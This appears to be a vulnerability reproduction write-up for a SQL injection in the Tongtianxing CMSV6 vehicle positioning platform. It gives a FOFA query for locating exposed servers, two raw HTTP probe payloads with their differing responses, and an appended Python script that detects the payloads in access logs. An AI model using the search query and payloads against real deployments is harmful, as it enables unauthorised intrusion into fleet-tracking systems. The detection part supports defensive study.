Disclaimer:
The content of this article is shared as study notes for technical learning and reference only; do not use it for illegal purposes. Any direct or indirect consequences or losses caused by any individual or organization using the information provided in this article are the sole responsibility of the user and have nothing to do with the author!!!
Vulnerability description
The Tongtianxing (通天星) CMSV6 vehicle positioning and monitoring platform does not effectively filter user input and concatenates it directly into the SQL query statement, resulting in a SQL injection vulnerability.
FOFA query
body="/808gps/"
Vulnerability reproduction
Open the page
Construct the payload
payload_1 request
GET /run_stop/delete.do;downloadLogger.action?ids=1)--+&loadAll=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Connection: close
Accept-Encoding: gzip, deflate, br
payload_1 response
HTTP/1.1 200
Set-Cookie: JSESSIONID=1F53FD95C492A2A4B80879E048C53064; Path=/; HttpOnly
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: POST, GET,OPTIONS
Access-Control-Max-Age: 3600
Access-Control-Allow-Headers: Origin, No-Cache, X-Requested-With, If-Modified-Since, Pragma, Last-Modified, Cache-Control, Expires, Content-Type, X-E4M-With,x-ui-request,lang,userId,token,csrftoken,Authorization,Access-Control-Allow-Headers
Access-Control-Allow-Credentials: true
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Disposition: inline;filename=f.txt
vary: accept-encoding
Content-Type: application/json;charset=UTF-8
Date: Tue, 02 Apr 2024 15:48:00 GMT
Connection: close
Content-Length: 85
{"result":0,"message":"OK","data":"","pagination":"","infos":"","key":"","resMap":""}
payload_2 request
GET /run_stop/delete.do;downloadLogger.action?ids=1)&loadAll=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Connection: close
Accept-Encoding: gzip, deflate, br
payload_2 response
HTTP/1.1 200
Set-Cookie: JSESSIONID=1F53FD95C492A2A4B80879E048C53064; Path=/; HttpOnly
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: POST, GET,OPTIONS
Access-Control-Max-Age: 3600
Access-Control-Allow-Headers: Origin, No-Cache, X-Requested-With, If-Modified-Since, Pragma, Last-Modified, Cache-Control, Expires, Content-Type, X-E4M-With,x-ui-request,lang,userId,token,csrftoken,Authorization,Access-Control-Allow-Headers
Access-Control-Allow-Credentials: true
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Disposition: inline;filename=f.txt
vary: accept-encoding
Content-Type: application/json;charset=UTF-8
Date: Tue, 02 Apr 2024 15:48:00 GMT
Connection: close
Content-Length: 85
{"message":"服务器异常","result":10001}
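Both responses above come back with HTTP 200, so alerting on status codes alone will not catch this probing; the difference is only in the JSON body. The following detection script is an added example and not part of the original post: it scans web-server access-log lines (constructed samples, in a "method path status" form) and flags requests to the vulnerable endpoint whose ids parameter is not a plain comma-separated list of integers, as well as the ";something.action" path-parameter suffix used in the payloads. The log format and the allow-list for ids are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not from the original post): the two
# payload requests from the write-up plus two lines of benign traffic.
SAMPLE_LOG = """\
GET /run_stop/delete.do;downloadLogger.action?ids=1)--+&loadAll=1 200
GET /run_stop/delete.do;downloadLogger.action?ids=1)&loadAll=1 200
GET /run_stop/delete.do?ids=12,15&loadAll=1 200
GET /808gps/StandardLoginAction_login.action?account=admin 200
"""

# Allow-list (assumption): a legitimate ids value is one or more integers
# separated by commas. Anything else (quotes, parentheses, "--", "#", ...)
# is treated as a SQL-injection indicator rather than blacklisting tokens.
ALLOWED_IDS = re.compile(r"\d+(,\d+)*")
# Path-parameter suffix seen in the write-up: ";<name>.action" appended to
# the servlet path before the query string.
MATRIX_PARAM = re.compile(r";[^/?]*\.action")

def classify(line):
    """Return the list of indicators found in one access-log line."""
    method, target, status = line.split()
    url = urlsplit(target)          # keeps ";..." inside url.path
    reasons = []
    if MATRIX_PARAM.search(url.path):
        reasons.append("matrix-param")
    # parse_qs percent-decodes values and turns "+" into a space, so the
    # payload "1)--+" is inspected as "1)-- ".
    for value in parse_qs(url.query).get("ids", []):
        if not ALLOWED_IDS.fullmatch(value):
            reasons.append("sqli-ids")
            break
    return reasons

def find_suspicious(log_text):
    """Return (line, indicators) for every flagged line in the log."""
    hits = []
    for line in log_text.splitlines():
        reasons = classify(line)
        if reasons:
            hits.append((line, reasons))
    return hits

if __name__ == "__main__":
    for line, reasons in find_suspicious(SAMPLE_LOG):
        print(", ".join(reasons), "<-", line)
```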